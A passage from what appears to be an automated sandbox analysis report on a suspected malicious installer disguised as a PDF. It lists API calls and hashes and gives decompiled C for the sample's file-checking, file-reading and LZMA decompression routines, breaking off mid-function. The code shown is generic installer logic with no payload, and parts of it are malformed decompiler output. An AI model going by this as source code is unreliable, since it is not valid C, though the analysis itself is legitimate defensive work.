                                                                                            0x004015d1
                                                                                            0x004015d5
                                                                                            0x004015d7
                                                                                            0x004015df
                                                                                            0x004015e1
                                                                                            0x004015e4
                                                                                            0x004015ea
                                                                                            0x00401604
                                                                                            0x00401607
                                                                                            0x004015ec
                                                                                            0x004015ec
                                                                                            0x004015ef
                                                                                            0x00000000
                                                                                            0x004015fa
                                                                                            0x004015fd
                                                                                            0x004015fd
                                                                                            0x004015ef
                                                                                            0x0040160e
                                                                                            0x00401615
                                                                                            0x00401624
                                                                                            0x00401624
                                                                                            0x00401617
                                                                                            0x0040161a
                                                                                            0x00401622
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00401622
                                                                                            0x00401615
                                                                                            0x00401627
                                                                                            0x0040162b
                                                                                            0x0040162c
                                                                                            0x004015d7
                                                                                            0x00401634
                                                                                            0x00401663
                                                                                            0x004022f1
                                                                                            0x00401636
                                                                                            0x00401638
                                                                                            0x00401645
                                                                                            0x0040164d
                                                                                            0x00401655
                                                                                            0x0040165b
                                                                                            0x0040165b
                                                                                            0x00401655
                                                                                            0x00402c2d
                                                                                            0x00402c39

                                                                                            APIs
                                                                                              • Part of subcall function 00405FE2: CharNextW.USER32(?,?,00425F50,?,00406056,00425F50,00425F50,746AFAA0,?,746AF560,00405D94,?,746AFAA0,746AF560,00000000), ref: 00405FF0
                                                                                              • Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 00405FF5
                                                                                              • Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 0040600D
                                                                                            • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                                                                              • Part of subcall function 00405B99: CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405BDC
                                                                                            • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\Temp,?,00000000,000000F0), ref: 0040164D
                                                                                            Strings
                                                                                            • C:\Users\user\AppData\Local\Temp, xrefs: 00401640
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.269472376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.269465559.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269481310.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269527274.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_TTCopy-240323-PDF.jbxd
                                                                                            Similarity
                                                                                            • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                            • String ID: C:\Users\user\AppData\Local\Temp
                                                                                            • API String ID: 1892508949-1104044542
                                                                                            • Opcode ID: 5100f8edfc5c73fcce05ecfe13f7e88f84c01c09c33b7a9b27ef58f2b5b0e964
                                                                                            • Instruction ID: a0118e7b9b939ef3ea3e51add98df8039a5aa70d3b8e99a19be4f9c31e9f39fe
                                                                                            • Opcode Fuzzy Hash: 5100f8edfc5c73fcce05ecfe13f7e88f84c01c09c33b7a9b27ef58f2b5b0e964
                                                                                            • Instruction Fuzzy Hash: 04112231508105EBCF30AFA0CD4099E36A0EF15329B28493BF901B22F1DB3E4982DB5E
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0040603F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47stringCOMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 53%
                                                                                            			E0040603F(void* __eflags, intOrPtr _a4) {
				int _t11;
				signed char* _t12;
				long _t16;
				intOrPtr _t18;
				intOrPtr* _t21;
				signed int _t23;

				E00406668(0x425f50, _a4);
				_t21 = E00405FE2(0x425f50);
				if(_t21 != 0) {
					E004068EF(_t21);
					if(( *0x42a278 & 0x00000080) == 0) {
						L5:
						_t23 = _t21 - 0x425f50 >> 1;
						while(1) {
							_t11 = lstrlenW(0x425f50);
							_push(0x425f50);
							if(_t11 <= _t23) {
								break;
							}
							_t12 = E0040699E();
							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
								E00405F83(0x425f50);
								continue;
							} else {
								goto L1;
							}
						}
						E00405F37();
						_t16 = GetFileAttributesW(??); // executed
						return 0 | _t16 != 0xffffffff;
					}
					_t18 =  *_t21;
					if(_t18 == 0 || _t18 == 0x5c) {
						goto L1;
					} else {
						goto L5;
					}
				}
				L1:
				return 0;
			}









                                                                                            0x0040604b
                                                                                            0x00406056
                                                                                            0x0040605a
                                                                                            0x00406061
                                                                                            0x0040606d
                                                                                            0x0040607d
                                                                                            0x0040607f
                                                                                            0x00406097
                                                                                            0x00406098
                                                                                            0x0040609f
                                                                                            0x004060a0
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406083
                                                                                            0x0040608a
                                                                                            0x00406092
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0040608a
                                                                                            0x004060a2
                                                                                            0x004060a8
                                                                                            0x00000000
                                                                                            0x004060b6
                                                                                            0x0040606f
                                                                                            0x00406075
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406075
                                                                                            0x0040605c
                                                                                            0x00000000

                                                                                            APIs
                                                                                              • Part of subcall function 00406668: lstrcpynW.KERNEL32(?,?,00000400,004037B0,00429260,NSIS Error), ref: 00406675
                                                                                              • Part of subcall function 00405FE2: CharNextW.USER32(?,?,00425F50,?,00406056,00425F50,00425F50,746AFAA0,?,746AF560,00405D94,?,746AFAA0,746AF560,00000000), ref: 00405FF0
                                                                                              • Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 00405FF5
                                                                                              • Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 0040600D
                                                                                            • lstrlenW.KERNEL32(00425F50,00000000,00425F50,00425F50,746AFAA0,?,746AF560,00405D94,?,746AFAA0,746AF560,00000000), ref: 00406098
                                                                                            • GetFileAttributesW.KERNELBASE(00425F50,00425F50,00425F50,00425F50,00425F50,00425F50,00000000,00425F50,00425F50,746AFAA0,?,746AF560,00405D94,?,746AFAA0,746AF560), ref: 004060A8
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.269472376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.269465559.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269481310.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269527274.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_TTCopy-240323-PDF.jbxd
                                                                                            Similarity
                                                                                            • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                            • String ID: P_B
                                                                                            • API String ID: 3248276644-906794629
                                                                                            • Opcode ID: 900e3a3aedd828ccf636743a116f58552bc6887dcb5d3e9637a901da882d1290
                                                                                            • Instruction ID: df110f430b83b9381375b5fd3fa67f6c4419d4890c6468873e0fced3c2676832
                                                                                            • Opcode Fuzzy Hash: 900e3a3aedd828ccf636743a116f58552bc6887dcb5d3e9637a901da882d1290
                                                                                            • Instruction Fuzzy Hash: 0DF07826144A1216E622B23A0C05BAF05098F82354B07063FFC93B22E1DF3C8973C43E
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 004061DB Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22fileCOMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 100%
                                                                                            			E004061DB(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}





                                                                                            0x004061df
                                                                                            0x004061ef
                                                                                            0x004061f7
                                                                                            0x00000000
                                                                                            0x004061fe
                                                                                            0x00000000
                                                                                            0x00406200

                                                                                            APIs
                                                                                            • ReadFile.KERNELBASE(?,00000000,00000000,00000000,00000000,eNotification,defghijklmnopqrstuvwxyz,004035F5,?,?,004034F9,eNotification,00004000,?,00000000,004033A3), ref: 004061EF
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.269472376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.269465559.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269481310.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269527274.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_TTCopy-240323-PDF.jbxd
                                                                                            Similarity
                                                                                            • API ID: FileRead
                                                                                            • String ID: defghijklmnopqrstuvwxyz$eNotification
                                                                                            • API String ID: 2738559852-2877872591
                                                                                            • Opcode ID: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                                                                            • Instruction ID: 689b8facb1381159ac92aeccc4703b7db47ce2620db9a14c340ec3ef8a35c8b1
                                                                                            • Opcode Fuzzy Hash: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                                                                            • Instruction Fuzzy Hash: C1E0863250021AABDF10AE518C04AEB375CEB01360F014477F922E2150D230E82187E8
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00407194 Relevance: 5.2, APIs: 4, Instructions: 236COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 99%
                                                                                            			E00407194() {
				signed int _t530;
				void _t537;
				signed int _t538;
				signed int _t539;
				unsigned short _t569;
				signed int _t579;
				signed int _t607;
				void* _t627;
				signed int _t628;
				signed int _t635;
				signed int* _t643;
				void* _t644;

				L0:
				while(1) {
					L0:
					_t530 =  *(_t644 - 0x30);
					if(_t530 >= 4) {
					}
					 *(_t644 - 0x40) = 6;
					 *(_t644 - 0x7c) = 0x19;
					 *((intOrPtr*)(_t644 - 0x58)) = (_t530 << 7) +  *(_t644 - 4) + 0x360;
					while(1) {
						L145:
						 *(_t644 - 0x50) = 1;
						 *(_t644 - 0x48) =  *(_t644 - 0x40);
						while(1) {
							L149:
							if( *(_t644 - 0x48) <= 0) {
								goto L155;
							}
							L150:
							_t627 =  *(_t644 - 0x50) +  *(_t644 - 0x50);
							_t643 = _t627 +  *((intOrPtr*)(_t644 - 0x58));
							 *(_t644 - 0x54) = _t643;
							_t569 =  *_t643;
							_t635 = _t569 & 0x0000ffff;
							_t607 = ( *(_t644 - 0x10) >> 0xb) * _t635;
							if( *(_t644 - 0xc) >= _t607) {
								 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t607;
								 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t607;
								_t628 = _t627 + 1;
								 *_t643 = _t569 - (_t569 >> 5);
								 *(_t644 - 0x50) = _t628;
							} else {
								 *(_t644 - 0x10) = _t607;
								 *(_t644 - 0x50) =  *(_t644 - 0x50) << 1;
								 *_t643 = (0x800 - _t635 >> 5) + _t569;
							}
							if( *(_t644 - 0x10) >= 0x1000000) {
								L148:
								_t487 = _t644 - 0x48;
								 *_t487 =  *(_t644 - 0x48) - 1;
								L149:
								if( *(_t644 - 0x48) <= 0) {
									goto L155;
								}
								goto L150;
							} else {
								L154:
								L146:
								if( *(_t644 - 0x6c) == 0) {
									L169:
									 *(_t644 - 0x88) = 0x18;
									L170:
									_t579 = 0x22;
									memcpy( *(_t644 - 0x90), _t644 - 0x88, _t579 << 2);
									_t539 = 0;
									L172:
									return _t539;
								}
								L147:
								 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
								 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
								_t484 = _t644 - 0x70;
								 *_t484 =  &(( *(_t644 - 0x70))[1]);
								 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
								goto L148;
							}
							L155:
							_t537 =  *(_t644 - 0x7c);
							 *((intOrPtr*)(_t644 - 0x44)) =  *(_t644 - 0x50) - (1 <<  *(_t644 - 0x40));
							while(1) {
								L140:
								 *(_t644 - 0x88) = _t537;
								while(1) {
									L1:
									_t538 =  *(_t644 - 0x88);
									if(_t538 > 0x1c) {
										break;
									}
									L2:
									switch( *((intOrPtr*)(_t538 * 4 +  &M00407602))) {
										case 0:
											L3:
											if( *(_t644 - 0x6c) == 0) {
												goto L170;
											}
											L4:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t538 =  *( *(_t644 - 0x70));
											if(_t538 > 0xe1) {
												goto L171;
											}
											L5:
											_t542 = _t538 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t581);
											_push(9);
											_pop(_t582);
											_t638 = _t542 / _t581;
											_t544 = _t542 % _t581 & 0x000000ff;
											asm("cdq");
											_t633 = _t544 % _t582 & 0x000000ff;
											 *(_t644 - 0x3c) = _t633;
											 *(_t644 - 0x1c) = (1 << _t638) - 1;
											 *((intOrPtr*)(_t644 - 0x18)) = (1 << _t544 / _t582) - 1;
											_t641 = (0x300 << _t633 + _t638) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t644 - 0x78))) {
												L10:
												if(_t641 == 0) {
													L12:
													 *(_t644 - 0x48) =  *(_t644 - 0x48) & 0x00000000;
													 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t641 = _t641 - 1;
													 *((short*)( *(_t644 - 4) + _t641 * 2)) = 0x400;
												} while (_t641 != 0);
												goto L12;
											}
											L6:
											if( *(_t644 - 4) != 0) {
												GlobalFree( *(_t644 - 4));
											}
											_t538 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t644 - 4) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t644 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L157:
												 *(_t644 - 0x88) = 1;
												goto L170;
											}
											L14:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x40) =  *(_t644 - 0x40) | ( *( *(_t644 - 0x70)) & 0x000000ff) <<  *(_t644 - 0x48) << 0x00000003;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t45 = _t644 - 0x48;
											 *_t45 =  *(_t644 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t644 - 0x48) < 4) {
												goto L13;
											}
											L16:
											_t550 =  *(_t644 - 0x40);
											if(_t550 ==  *(_t644 - 0x74)) {
												L20:
												 *(_t644 - 0x48) = 5;
												 *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) =  *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											L17:
											 *(_t644 - 0x74) = _t550;
											if( *(_t644 - 8) != 0) {
												GlobalFree( *(_t644 - 8));
											}
											_t538 = GlobalAlloc(0x40,  *(_t644 - 0x40)); // executed
											 *(_t644 - 8) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t557 =  *(_t644 - 0x60) &  *(_t644 - 0x1c);
											 *(_t644 - 0x84) = 6;
											 *(_t644 - 0x4c) = _t557;
											_t642 =  *(_t644 - 4) + (( *(_t644 - 0x38) << 4) + _t557) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L158:
												 *(_t644 - 0x88) = 3;
												goto L170;
											}
											L22:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											_t67 = _t644 - 0x70;
											 *_t67 =  &(( *(_t644 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L23:
											 *(_t644 - 0x48) =  *(_t644 - 0x48) - 1;
											if( *(_t644 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t559 =  *_t642;
											_t626 = _t559 & 0x0000ffff;
											_t596 = ( *(_t644 - 0x10) >> 0xb) * _t626;
											if( *(_t644 - 0xc) >= _t596) {
												 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t596;
												 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t596;
												 *(_t644 - 0x40) = 1;
												_t560 = _t559 - (_t559 >> 5);
												__eflags = _t560;
												 *_t642 = _t560;
											} else {
												 *(_t644 - 0x10) = _t596;
												 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
												 *_t642 = (0x800 - _t626 >> 5) + _t559;
											}
											if( *(_t644 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t644 - 0x6c) == 0) {
												L168:
												 *(_t644 - 0x88) = 5;
												goto L170;
											}
											L138:
											 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L139:
											_t537 =  *(_t644 - 0x84);
											L140:
											 *(_t644 - 0x88) = _t537;
											goto L1;
										case 6:
											L25:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L36:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L26:
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												L35:
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												L32:
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											L66:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												L68:
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											L67:
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											L70:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											L73:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											L74:
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											L75:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											L82:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L84:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L83:
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											L85:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L164:
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											L100:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L159:
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											L38:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											L40:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
